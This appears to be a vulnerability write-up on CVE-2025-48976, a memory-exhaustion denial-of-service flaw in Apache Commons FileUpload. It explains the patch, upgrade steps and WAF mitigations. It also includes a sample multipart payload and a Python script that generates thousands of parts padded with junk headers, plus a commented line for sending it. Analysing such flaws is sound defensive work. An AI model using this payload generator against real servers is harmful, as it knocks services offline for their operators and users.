Jan 23, 2026 · 4 min read
Apache Commons FileUpload allowed multipart part headers to be up to 10KB by default. By sending thousands of parts in a single request, an attacker can force the server to allocate massive amounts of memory for headers, leading to an OutOfMemoryError (OOM) and Denial of Service. Fixed in 1.6 and 2.0.0-M4 by dropping the default limit to 512 bytes.
Apache Commons FileUpload, the ubiquitous Java library for handling multipart file uploads, failed to strictly limit the size of headers within individual multipart sections. This allows attackers to exhaust server memory via a 'Cumulative Resource Exhaustion' attack.
If you are a Java developer, you have used Apache Commons FileUpload. It is the silent workhorse behind multipart/form-data parsing in nearly every major framework—Tomcat, Struts, Spring (historically), and countless enterprise monoliths. It is the plumbing of the Java web world.
But plumbing is only interesting when it explodes. CVE-2025-48976 is exactly that kind of explosion. It isn't a sexy RCE involving deserialization gadget chains; it's a brute-force assault on the logic of how we handle input.
The vulnerability lies in a simple assumption: that a user uploading a file will behave reasonably. The developers assumed that the headers describing a file part (like Content-Disposition or Content-Type) wouldn't be excessively large. They were wrong. And because they were wrong, we can crash the server.
Here is the issue: When you send a multipart request, it's split into 'parts'. Each part has its own set of headers. In affected versions of Commons FileUpload (1.x < 1.6 and 2.x < 2.0.0-M4), the library enforced a limit on these headers, but it was surprisingly generous: 10,240 bytes (10KB) per part.
> [!WARNING]
> 10KB doesn't sound like much, right?
Wrong. That is 10KB per part. The library didn't account for an attacker sending a single HTTP POST request containing 10,000 parts.
Do the math: 10,000 parts * 10KB headers = 100 MB of raw string data. Now add the overhead of Java String objects (which are not memory-efficient), the internal buffering in MultipartStream, and the CPU cycles required to trim, parse, and map those headers. You are suddenly looking at gigabytes of heap allocation for a request that takes seconds to generate. This is Cumulative Resource Exhaustion.
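The arithmetic above can be sketched in a few lines of Python. The helper name is mine, and the figures are raw byte counts only; real heap cost is higher once Java String overhead, object headers, and parser buffers are added:

```python
# Back-of-the-envelope cost of the attack, before vs. after the patch.
# Raw header bytes only -- actual JVM heap usage is substantially higher.

def attack_memory_mb(parts: int, header_limit_bytes: int) -> float:
    """Raw header bytes an attacker can force the parser to buffer, in MB."""
    return parts * header_limit_bytes / (1024 * 1024)

# Vulnerable default: 10 KB of headers per part, 10,000 parts in one POST.
vulnerable = attack_memory_mb(10_000, 10_240)   # ~97.7 MB of raw bytes

# Patched default: 512 bytes per part -- same 10,000 parts buys far less.
patched = attack_memory_mb(10_000, 512)         # ~4.9 MB

print(f"vulnerable: {vulnerable:.1f} MB, patched: {patched:.1f} MB")
print(f"cost multiplier for the attacker: {10_240 // 512}x")
```

The 20x multiplier is exactly why the fix works: the attacker must now send 20 times as many parts to hold the same amount of header data in memory.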
The fix is brutal but effective. The maintainers realized that legitimate multipart headers (like Content-Disposition: form-data; name="file"; filename="holiday_photos.jpg") are rarely larger than a tweet. They didn't need a 10KB buffer.
In the patch (Commit b247774...), they introduced a new, stricter configuration partHeaderSizeMax and slashed the default limit drastically.
The Vulnerable Configuration (Implicit):

```java
// Roughly 10KB hardcoded or loosely enforced
public static final int HEADER_PART_SIZE_MAX = 10240;
```

The Fixed Code (v1.6 / v2.0.0-M4):

```java
// Default slashed to 512 bytes
public static final int DEFAULT_PART_HEADER_SIZE_MAX = 512;

// Inside MultipartStream.readHeaders()
if (headersSize > partHeaderSizeMax) {
    throw new FileUploadIOException(
        new SizeLimitExceededException(
            "The header section of a part is too large",
            headersSize,
            partHeaderSizeMax));
}
```

By enforcing a 512-byte limit, they forced the attack cost up significantly. To consume the same amount of memory, an attacker would need to send 20x more parts, likely hitting other limits (like total request size or connection timeouts) before the JVM crashes.
Exploiting this is trivial. You don't need Metasploit; you need a few lines of Python. We essentially want to spam the server with valid boundaries, but stuff the headers of each part with junk until we hit just under that 10KB limit.
Here is what the payload structure looks like:
```http
POST /upload HTTP/1.1
Host: vulnerable-app.com
Content-Type: multipart/form-data; boundary=---------------------------123456789
Content-Length: [Huge]

-----------------------------123456789
Content-Disposition: form-data; name="part1"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA

[small body content]
-----------------------------123456789
Content-Disposition: form-data; name="part2"
X-Junk-Header: AAAAAAAAAAAAAAAAA... [repeat 10,000 times] ...AAAA

[small body content]
... [Repeat 50,000 times] ...
```

(Note that each delimiter line in the body is the declared boundary prefixed with `--`, per the multipart grammar.)

When the Java application receives this, readHeaders() allocates a buffer for Part 1, validates it (it's under 10KB, so it passes), and keeps it in memory. Then it moves to Part 2. Allocate. Validate. Keep.
Eventually, the Garbage Collector (GC) enters a 'panic mode' (GC thrashing), trying to reclaim memory that is still legitimately referenced by the active request thread. CPU spikes to 100%, and shortly after: java.lang.OutOfMemoryError: Java heap space.
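The payload above can be generated with a short script. Here is a sketch that only builds the body, so you can inspect it before pointing it at your own test instance; the boundary string, header name, and part sizing are illustrative, not taken from any public PoC:

```python
# Sketch: build a multipart body where every part carries a junk header
# padded to just under the vulnerable 10 KB per-part header limit.
# Boundary and field names are illustrative. Test only against your own systems.

BOUNDARY = "----evilboundary1234567890"
HEADER_LIMIT = 10_240  # the vulnerable default, in bytes per part

def build_part(index: int) -> bytes:
    disposition = f'Content-Disposition: form-data; name="part{index}"\r\n'
    # Pad a junk header so this part's header block sits just under 10 KB.
    junk = "X-Junk: " + "A" * (HEADER_LIMIT - len(disposition) - 64) + "\r\n"
    # Delimiter, headers, blank line, then a tiny one-byte body.
    return f"--{BOUNDARY}\r\n{disposition}{junk}\r\nx\r\n".encode()

def build_body(parts: int) -> bytes:
    chunks = [build_part(i) for i in range(parts)]
    chunks.append(f"--{BOUNDARY}--\r\n".encode())  # closing delimiter
    return b"".join(chunks)

body = build_body(1_000)  # a real attack would use tens of thousands of parts
print(f"{len(body) / (1024 * 1024):.1f} MB of multipart body")
# To send (requires the 'requests' package):
#   requests.post(url, data=body, headers={
#       "Content-Type": f"multipart/form-data; boundary={BOUNDARY}"})
```

Each part costs the attacker ~10 KB of bandwidth but forces the server to buffer, trim, parse, and map that header block into Java Strings before moving on.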
This is a mandatory upgrade for anyone exposing file uploads to the internet.
Check whether you are pulling it in, directly or transitively:

```shell
mvn dependency:tree | grep fileupload
```

If you absolutely cannot upgrade (why?), you might be able to mitigate this with a WAF rule that blocks requests with an excessive number of Content-Disposition headers or abnormally large part headers, though this is fragile.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Apache Commons FileUpload (Apache Software Foundation) | < 1.6 | 1.6 |
| Apache Commons FileUpload (Apache Software Foundation) | 2.0.0-M1 - 2.0.0-M3 | 2.0.0-M4 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-770 |
| Attack Vector | Network |
| CVSS | 7.5 (High) |
| Impact | Denial of Service (DoS) |
| EPSS Score | 0.0017 |
| Exploit Status | PoC Available |
CWE-770: Allocation of Resources Without Limits or Throttling